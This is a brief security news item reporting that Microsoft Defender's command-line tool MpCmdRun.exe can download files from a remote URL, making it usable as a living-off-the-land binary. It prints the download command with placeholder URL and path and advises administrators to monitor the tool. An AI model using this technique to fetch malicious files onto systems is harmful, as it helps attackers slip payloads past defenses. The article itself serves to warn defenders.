A recent update Microsoft Defender Windows 10 allows malware and other infected files to be downloaded to a Windows computer.
Existing operating system files can be used for malicious purposes such as live-off-the-land or LOLBIN binaries.
Following a recent update Microsoft Defender, the MpCmdRun.exe command-line tool can be used to download malicious files from a remote location.
So the Microsoft Defender is now part of the long list of Windows programs that can be used by hackers.
The Microsoft Defender can be used as LOLBIN
This feature allows a local user to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download a file from a remote location by running the following command:
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
In tests conducted by iguru.gr, this feature was added to Microsoft Defender in the version 4.18.2007.9 or 4.18.2009.9.
The good news is that Microsoft Defender will detect the malicious files that will be downloaded with MpCmdRun.exe.
With this discovery, administrators now have an additional Windows executable program that they need to watch to avoid being used against them.